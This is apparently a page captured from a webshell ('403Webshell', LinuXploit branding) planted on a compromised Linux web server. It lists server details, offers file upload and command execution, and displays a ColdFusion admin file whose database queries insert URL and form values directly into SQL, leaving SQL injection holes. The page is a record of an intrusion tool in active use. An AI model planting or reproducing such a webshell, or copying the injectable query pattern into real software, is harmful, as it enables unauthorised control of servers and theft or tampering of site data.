403Webshell
Server IP : 104.21.21.239  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/cgny/nympadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/cgny/nympadmin/multilink.cfm
<Cfif parameterexists(url.add)>
<cfquery name=addphoto datasource="#ds#">
INSERT INTO ParentsListingsLinks(listingsid,link)
VALUES	(#url.id#,'#form.link#')
		</cfquery>
</Cfif>

<html><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" link="#B22023" vlink="CC6262" alink="#B22023" >
<font face="verdana" size="-1">
<b>Track Multiple Links</b>
<cfoutput>
<FORM action="multilink.cfm?add=on&id=#url.id#" method="post" enctype="multipart/form-data">
</cfoutput>
   <table cellspacing=5 cellpadding=5 border=0>
  <tr><td>
	  <b><font SIZE="-1" FACE="verdana">Link</b><br>
  </td><td>
	  <input NAME="link" SIZE="65">
<input type="submit" Value="Add Link">  </td></tr>
   </table>
</form>
</td></tr></table>

<Table width="100%" cellpadding="4" cellspacing="0" border="1">
<cfquery name="getlinks" dataSource="#ds#">
select * from ParentsListingsLinks
where listingsid = #url.id#
order by id desc
</cfquery>

<cfoutput query="getlinks">
<Tr><Td><Font face="verdana" size=-2>
<A href="http://nymetroparents.com/linktrackmultiple.cfm?id=#id#" target="_blank">#link#</A>
</Font></Td>
<Td><Font face="verdana" size=-2>
<A href="http://nymetroparents.com/linktrackmultiple.cfm?id=#id#" target="_blank">http://nymetroparents.com/linktrackmultiple.cfm?id=#id#</A>
</Font></Td>

</cfoutput>

</Table>
</body>

Youez - 2016 - github.com/yon3zu
LinuXploit